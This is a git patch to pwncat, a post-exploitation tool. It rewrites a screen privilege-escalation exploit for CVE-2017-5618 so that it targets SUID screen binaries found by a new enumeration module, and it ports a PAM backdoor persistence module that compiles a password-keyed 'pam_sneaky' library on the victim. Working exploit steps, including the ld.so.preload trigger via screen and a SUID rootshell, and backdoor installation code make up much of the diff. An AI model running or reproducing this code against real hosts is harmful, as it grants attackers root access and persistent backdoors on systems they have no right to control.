From e3583607bad27014b1818e661d3b073594bcd55b Mon Sep 17 00:00:00 2001 From: Caleb Stewart Date: Tue, 2 Jun 2020 21:09:11 -0400 Subject: [PATCH] Rewrote pam persistence and screen privesc to use new compile interface. Added screen enumeration module as well. --- pwncat/enumerate/screen_versions.py | 57 +++++ pwncat/enumerate/suid.py | 5 +- pwncat/lexer.py | 35 --- pwncat/persist/pam.py | 41 ++-- pwncat/privesc/screen.py | 70 +++--- pwncat/pysudoers.py | 330 ---------------------------- pwncat/remote/victim.py | 3 +- 7 files changed, 116 insertions(+), 425 deletions(-) create mode 100644 pwncat/enumerate/screen_versions.py delete mode 100644 pwncat/lexer.py delete mode 100644 pwncat/pysudoers.py diff --git a/pwncat/enumerate/screen_versions.py b/pwncat/enumerate/screen_versions.py new file mode 100644 index 0000000..a6ed459 --- /dev/null +++ b/pwncat/enumerate/screen_versions.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python3 +import dataclasses +import shlex +from typing import Generator + +from colorama import Fore + +import pwncat +from pwncat.enumerate import FactData + +name = "pwncat.enumerate.screen_versions" +provides = "screen-version" +per_user = True + + +@dataclasses.dataclass +class ScreenVersion(FactData): + + path: str + perms: int + vulnerable: bool = True + + def __str__(self): + return f"{Fore.CYAN}{self.path}{Fore.RESET} (perms: {Fore.BLUE}{oct(self.perms)[2:]}{Fore.RESET})" + + +def enumerate() -> Generator[FactData, None, None]: + """ + Find all version of screen that are on the host. This looks for `screen` + as well as anything like `screen-4.5.0`. This assists with the CVE-2017-5618 + exploit. + + :return: + """ + + # Grab current path plus other interesting paths + paths = set(pwncat.victim.getenv("PATH").split(":")) + paths = paths | { + "/bin", + "/sbin", + "/usr/local/bin", + "/usr/local/sbin", + "/usr/bin", + "/usr/sbin", + } + + # Look for matching binaries + with pwncat.victim.subprocess( + f"find {shlex.join(paths)} \( -type f -or -type l \) -executable -name 'screen*' -printf '%#m %p\\n' 2>/dev/null" + ) as pipe: + for line in pipe: + line = line.decode("utf-8").strip() + perms, *path = line.split(" ") + path = " ".join(path) + perms = int(perms, 8) + + yield ScreenVersion(path, perms) diff --git a/pwncat/enumerate/suid.py b/pwncat/enumerate/suid.py index 8ef19b0..f6bdc45 100644 --- a/pwncat/enumerate/suid.py +++ b/pwncat/enumerate/suid.py @@ -25,10 +25,7 @@ class Binary: """ The owner of the binary """ def __str__(self): - if self.owner.id == 0: - color = Fore.RED - else: - color = Fore.GREEN + color = Fore.RED if self.owner.id == 0 else Fore.GREEN return f"{Fore.CYAN}{self.path}{Fore.RESET} owned by {color}{self.owner.name}{Fore.RESET}" @property diff --git a/pwncat/lexer.py b/pwncat/lexer.py deleted file mode 100644 index f515a32..0000000 --- a/pwncat/lexer.py +++ /dev/null @@ -1,35 +0,0 @@ -#!/usr/bin/env python3 -from pygments.lexer import RegexLexer, bygroups, include -from pygments.token import * - -from pygments.style import Style -from prompt_toolkit.styles.pygments import style_from_pygments_cls -from pygments.styles import get_style_by_name - -PwncatStyle = style_from_pygments_cls(get_style_by_name("monokai")) - - -class LocalCommandLexer(RegexLexer): - - tokens = { - "root": [ - (r"download", Name.Function), - (r"upload", Name.Function), - (r"sync", Name.Function), - (r"help", Name.Function), - (r"privesc", Name.Function), - (r"--?[a-zA-Z-]+", Name.Label), - (r"'", String.Single), - (r".", Text), - ], - "single-string": [ - (r"\'", String.Single), - (r"'", String.Single, "#pop"), - (r".", String.Single), - ], - "double-string": [ - (r"\"", String.Double), - (r'"', String.Double, "#pop"), - (r".", String.Double), - ], - } diff --git a/pwncat/persist/pam.py b/pwncat/persist/pam.py index fe52f0a..2b89578 100644 --- a/pwncat/persist/pam.py +++ b/pwncat/persist/pam.py @@ -1,6 +1,7 @@ #!/usr/bin/env python3 import base64 import hashlib +import io import os import textwrap from typing import Optional @@ -8,7 +9,7 @@ from typing import Optional import pwncat from pwncat import util from pwncat.persist import PersistenceMethod, PersistenceError -from pwncat.util import Access +from pwncat.util import Access, CompilationError class Method(PersistenceMethod): @@ -79,6 +80,7 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg== sneaky_source = base64.b64decode(sneaky_source).decode("utf-8") # We use the backdoor password. Build the string of encoded bytes + # These are placed in the source like: char password_hash[] = {0x01, 0x02, 0x03, ...}; password = hashlib.sha1( pwncat.victim.config["backdoor_pass"].encode("utf-8") ).digest() @@ -93,26 +95,18 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg== # Write the source try: - util.progress("pam_sneaky: creating source") + util.progress("pam_sneaky: compiling shared library") - # Create the tempfile - with pwncat.victim.tempfile( - "w", length=len(sneaky_source), suffix=".c" - ) as filp: - filp.write(sneaky_source) - source_path = filp.name - - # Replace ".c" with ".o" - lib_path = source_path.rstrip(".c") + ".so" - - util.progress("pam_sneaky: building shared library") - - pwncat.victim.env( - ["gcc", "-o", lib_path, "-shared", "-fPIE", source_path, "-lcrypto"] - ) - - if Access.EXISTS not in pwncat.victim.access(lib_path): - raise PersistenceError("pam_sneaky: module compilation failed") + try: + # Compile our source for the remote host + lib_path = pwncat.victim.compile( + [io.StringIO(sneaky_source)], + suffix=".so", + cflags=["-shared", "-fPIE"], + ldflags=["-lcrypto"], + ) + except (FileNotFoundError, CompilationError) as exc: + raise PersistenceError(f"pam: compilation failed: {exc}") util.progress("pam_sneaky: locating pam module location") @@ -191,13 +185,6 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg== except FileNotFoundError as exc: # A needed binary wasn't found. Clean up whatever we created. raise PersistenceError(str(exc)) - finally: - try: - # Whatever happens, remove our source file. - pwncat.victim.env(["rm", "-f", source_path]) - except FileNotFoundError: - # If we can't remove it, register it as a tamper - pwncat.victim.tamper.created_file(source_path) def remove(self, user: Optional[str] = None): """ Remove this method """ diff --git a/pwncat/privesc/screen.py b/pwncat/privesc/screen.py index 734dcb6..5388d43 100644 --- a/pwncat/privesc/screen.py +++ b/pwncat/privesc/screen.py @@ -14,48 +14,62 @@ from pwncat.util import CompilationError class Method(BaseMethod): name = "screen (CVE-2017-5618)" - BINARIES = ["screen"] - - def __init__(self): - self.ran_before = False + BINARIES = [] def enumerate(self, capability: int = Capability.ALL) -> List[Technique]: """ Find all techniques known at this time """ # If we have ran this before, don't bother running it - if self.ran_before or not (Capability.SHELL & capability): + if Capability.SHELL not in capability: return [] - # Carve out the version of screen - version_output = pwncat.victim.run("screen -v").decode("utf-8").strip() - match = re.search(r"(\d+\.\d+\.\d+)", version_output) - if not match: - raise PrivescError("could not gather screen version") + # Grab all possibly vulnerable screen version + # It has to be SUID for this to work. + facts = [ + f + for f in pwncat.victim.enumerate("screen-version") + if f.data.vulnerable and f.data.perms & 0o4000 + ] - # Knowing the version of screen, check if it is vulnerable... - version_triplet = [int(x) for x in match.group().split(".")] + # Make a list of techniques to return + techniques: List[Technique] = [] - if version_triplet[0] > 4: - raise PrivescError("screen seemingly not vulnerable") + for fact in facts: - if version_triplet[0] == 4 and version_triplet[1] > 5: - raise PrivescError("screen seemingly not vulnerable") + # Carve out the version of screen + version_output = ( + pwncat.victim.run(f"{fact.data.path} -v").decode("utf-8").strip() + ) + match = re.search(r"(\d+\.\d+\.\d+)", version_output) + if not match: + continue - if ( - version_triplet[0] == 4 - and version_triplet[1] == 5 - and version_triplet[2] >= 1 - ): - raise PrivescError("screen seemingly not vulnerable") + # We know the version of screen, check if it is vulnerable... + version_triplet = [int(x) for x in match.group().split(".")] + + if version_triplet[0] > 4: + continue + + if version_triplet[0] == 4 and version_triplet[1] > 5: + continue + + if ( + version_triplet[0] == 4 + and version_triplet[1] == 5 + and version_triplet[2] >= 1 + ): + continue + + # This may work! + techniques.append(Technique("root", self, fact, Capability.SHELL)) - # If screen is vulnerable, try the technique! - techniques = [Technique("root", self, None, Capability.SHELL)] return techniques def execute(self, technique: Technique): """ Run the specified technique """ - self.ran_before = True + # Grab the path from the fact (see self.enumerate) + screen = technique.ident.data.path # Write the rootshell source code rootshell_source = textwrap.dedent( @@ -114,10 +128,10 @@ class Method(BaseMethod): pwncat.victim.run("umask 000") # Run screen, loading our library and causing our rootshell to be SUID - pwncat.victim.run(f'screen -D -m -L ld.so.preload echo -ne "{libhack_so}"') + pwncat.victim.run(f'{screen} -D -m -L ld.so.preload echo -ne "{libhack_so}"') # Trigger the exploit - pwncat.victim.run("screen -ls") + pwncat.victim.run(f"{screen} -ls") # We no longer need the shared object pwncat.victim.env(["rm", "-f", libhack_so]) @@ -133,7 +147,7 @@ class Method(BaseMethod): pwncat.victim.env(["cd", old_cwd]) # Ensure the files are removed - pwncat.victim.env(["rm", "-f", libhack_so, rootshell]) + pwncat.victim.env(["rm", "-f", rootshell]) raise PrivescError("failed to create root shell") diff --git a/pwncat/pysudoers.py b/pwncat/pysudoers.py deleted file mode 100644 index aeb6bcf..0000000 --- a/pwncat/pysudoers.py +++ /dev/null @@ -1,330 +0,0 @@ -# Pwncat rendition of pysudoers module -# Original code: https://github.com/broadinstitute/python-sudoers -# Patched to pull from file object, not strictly path filename -# -*- coding: utf-8 -*- - -"""Manage a sudoers file.""" - -import logging -import re - -LOGGER = logging.getLogger(__name__) - - -class Sudoers(object): - """Provide methods for dealing with all aspects of a sudoers file.""" - - def __init__(self, path=None, filp=None): - """Initialize the class. - - :param string path: The path to the sudoers file - """ - - if path is not None and filp is not None: - raise ValueError("must supply either path or file pointer argument") - - self._alias_types = ["Cmnd_Alias", "Host_Alias", "Runas_Alias", "User_Alias"] - - # Patched for use in pwncat - # self._path = path - - # Initialize the internal _data data member - self._data = {} - self._data["Defaults"] = [] - self._data["Rules"] = [] - for alias in self._alias_types: - self._data[alias] = {} - - if path is not None: - with open(path) as fp: - self.parse_file(fp) - elif filp is not None: - self.parse_file(filp) - - @property - def cmnd_aliases(self): - """Return the command aliases.""" - return self._data["Cmnd_Alias"] - - @property - def defaults(self): - """Return any Defaults.""" - return self._data["Defaults"] - - @property - def host_aliases(self): - """Return the host aliases.""" - return self._data["Host_Alias"] - - # Patched out for use within Pwncat - # @property - # def path(self): - # """Return the path to the sudoers file.""" - # return self._path - - @property - def rules(self): - """Return the rules.""" - return self._data["Rules"] - - @property - def runas_aliases(self): - """Return the run as aliases.""" - return self._data["Runas_Alias"] - - @property - def user_aliases(self): - """Return the user aliases.""" - return self._data["User_Alias"] - - @staticmethod - def parse_alias(alias_key, line): - """Parse an alias line into its component parts. - :param str alias_key: The type of alias we are parsing - :param str line: The line from sudoers - - :return: 0) the key for the alias and 1) the list of members of that alias - :rtype: tuple - """ - # We need to keep all line spacing, so use the original line with the index stripped - kvline = re.sub(r"^%s " % alias_key, "", line) - - # Split out the alias key/value - keyval = kvline.split("=") - if (len(keyval) != 2) or (not keyval[1]): - raise BadAliasException("bad alias: %s" % line) - - # Separate the comma-separated list of values - val_list = keyval[1].split(",") - if not val_list: - raise BadAliasException("bad alias: %s" % line) - # Make sure extra whitespace is stripped for each item in the list, then convert back to a list - val_list = list(map(str.strip, val_list)) - - # Return a tuple with the key / value pair - return (keyval[0], val_list) - - @staticmethod - def parse_commands(commands): - """Parse all commands from a rule line. - - Given a portion of a user specification (rule) line representing the *commands* part of the rule, parse out - the components and return the results as a list of dictionaries. There will be one dictionary per command in - the line, and the keys of the dictionary will be *run_as*, *command*, and *tags*. *run_as* and *tags* will - also be lists. - - :param str commands: The portion of a rule line representing the commands - - :return: A dictionary describing the commands allowed - :rtype: dict - """ - # This is the regular expression to try to parse out each command per line if it has a run as - runas_re = re.compile(r"\s*\(([\w,?]*)\)\s*([\S\s]*)") - data = [] - - # runas and tags are running collectors as they are inherited by later commands - runas = None - tags = None - - cmds = commands.split(",") - for command in cmds: - tmp_data = {} - tmp_command = None - # See if we have parentheses (a "run as") in the current command - match = runas_re.search(command) - if match: - tmp_data["run_as"] = match.group(1).split(",") - # Keep track of the latest "run_as" - runas = tmp_data["run_as"] - # tmp["command"] = match.group(2) - tmp_command = match.group(2) - else: - # Else, just treat this like a normal command - tmp_data["run_as"] = runas - # tmp["command"] = command - tmp_command = command - - # Now check for tags - tmp_data["tags"] = tags - cmd_pieces = tmp_command.split(":") - # The last element of the list, but return the string, not a 1-element list - tmp_data["command"] = cmd_pieces[-1:][0] - # tag_index is everything but the last element - tag_index = len(cmd_pieces) - 1 - if tag_index > 0: - tmp_data["tags"] = cmd_pieces[:tag_index] - tags = tmp_data["tags"] - - data.append(tmp_data) - - return data - - def parse_rule(self, line): - """Parse a rule line into its component parts. - - Given a user specification (rule) line, parse out the components and return the results in a dictionary. The - keys of the returned dictionary will be *users*, *hosts*, and *commands*. - - :param str line: The line from the sudoers file to be parsed - - :return: A dictionary describing the rule line - :rtype: dict - """ - # rule_re = re.compile(r"([\S\s]*)=([\S\s]*)") - - # rule_re = re.compile(r"([\S\s]*)=([\S\s]*)") - rule_split_equal = line.split("=") - left, right = [x.replace("(", "").replace(")", "") for x in rule_split_equal] - rule = {} - - # Do a basic check for rule syntax - # match = rule_re.search(line) - # if not match: - # raise BadRuleException("invalid rule: %s" % line) - - # Split to the left of the = into user and host parts - pieces = left.split() - - # rule["users"] = pieces[0].split(",") - # rule["hosts"] = pieces[1].split(",") - rule["users"] = pieces[0].split(",") - rule["hosts"] = pieces[1].split(",") - - # Parse the commands - rule["commands"] = self.parse_commands(right) - - return rule - - def parse_line(self, line): - """Parse one line of the sudoers file. - - Take one line from the sudoers file and parse it. The contents of the line are stored in the internal - *_data* member according to the type of the line. There is no return value from this function. - """ - defaults_re = re.compile(r"^Defaults") - - # Trim unnecessary spaces (no spaces before/after commas and colons) - line = re.sub(r"\s*([,:])\s*", r"\g<1>", line) - - pieces = line.split() - if pieces[0] in self._alias_types: - index = pieces[0] - - # Raise an exception if there aren't at least 2 elements after the split - if len(pieces) < 2: - raise BadAliasException("bad alias: %s" % line) - - (key, members) = self.parse_alias(index, line) - if key in self._data[index]: - raise DuplicateAliasException("duplicate alias: %s" % line) - - self._data[index][key] = members - # Debugging output - logging.info("%s: %s => %s", index, key, members) - elif defaults_re.search(line): - self._data["Defaults"].append(line) - else: - # Everything that doesn't match the above aliases is assumed to be a rule - rule = self.parse_rule(line) - self._data["Rules"].append(rule) - - def parse_file(self, sudo): - """Parse the sudoers file. - - Parse the entire sudoers file. The results are stored in the internal *_data* member. There is no return - value from this function. - """ - backslash_re = re.compile(r"\\$") - - # Patched out for use within pwncat - # sudo = open(self._path, "r") - - for line in sudo: - # Strip whitespace from beginning and end - line = line.strip() - # Ignore all comments - if line.startswith("#"): - continue - # Ignore all empty lines - if not line: - continue - - if backslash_re.search(line): - concatline = line.rstrip("\\") - while True: - # Get the next line from the file - nextline = next(sudo).strip() - # Make sure we don't go past EOF - if not nextline: - break - # Add the next line to the previous line - concatline += nextline.rstrip("\\") - # Break when the next line doesn't end with a backslash - if not backslash_re.search(nextline): - break - - line = concatline - - logging.debug(line) - self.parse_line(line) - - sudo.close() - - def _resolve_aliases(self, alias_type, name): - """For the provided alias type, resolve the provided name for any aliases that may exist. - - This function is recursive in nature. If the provided name is not an existing alias, it is returned (as a - list). If the name is an alias of the provided type, the function is called again on each of the names derived - from the alias in case there are nested aliases. - - :param obj alias_type: The alias type for which we are resolving - :param str name: A string representing a name or another alias - - :return: A list of one or more name - :rtype: list - """ - data = [] - - # See if the name provided is an alias or not. - if name in self._data[alias_type]: - namematch = self._data[alias_type][name] - - # For each name in the list, try to resolve that name as well, and then add it to the accumulator - for expanded_name in namematch: - resolved = self._resolve_aliases(alias_type, expanded_name) - # Cycle through the resolved list and remove any duplicates - for res in resolved: - if res not in data: - data.append(res) - else: - data = [name] - - return data - - def resolve_command(self, command): - """Resolve the provided command for any aliases that may exist.""" - return self._resolve_aliases("Cmnd_Alias", command) - - def resolve_host(self, host): - """Resolve the provided host for any aliases that may exist.""" - return self._resolve_aliases("Host_Alias", host) - - def resolve_runas(self, runas): - """Resolve the provided run as user for any aliases that may exist.""" - return self._resolve_aliases("Runas_Alias", runas) - - def resolve_user(self, user): - """Resolve the provided user for any aliases that may exist.""" - return self._resolve_aliases("User_Alias", user) - - -class BadAliasException(Exception): - """Provide a custom exception type to be raised when an alias is malformed.""" - - -class BadRuleException(Exception): - """Provide a custom exception type to be raised when a rule is malformed.""" - - -class DuplicateAliasException(Exception): - """Provide a custom exception type to be raised when an alias is malformed.""" diff --git a/pwncat/remote/victim.py b/pwncat/remote/victim.py index 8b10398..dfba384 100644 --- a/pwncat/remote/victim.py +++ b/pwncat/remote/victim.py @@ -865,7 +865,7 @@ class Victim: real_sources.append(dest.name) # We just need to create a file... - with self.tempfile("w", length=1) as filp: + with self.tempfile("w", length=1, suffix=suffix) as filp: filp.write("\n") remote_path = filp.name @@ -881,6 +881,7 @@ class Victim: self.env(["rm", "-f", *real_sources]) if "__pwncat_gcc_failed__" in stdout: + self.env(["rm", "-f", remote_path]) raise util.CompilationError(True, stdout, stdout) util.erase_progress()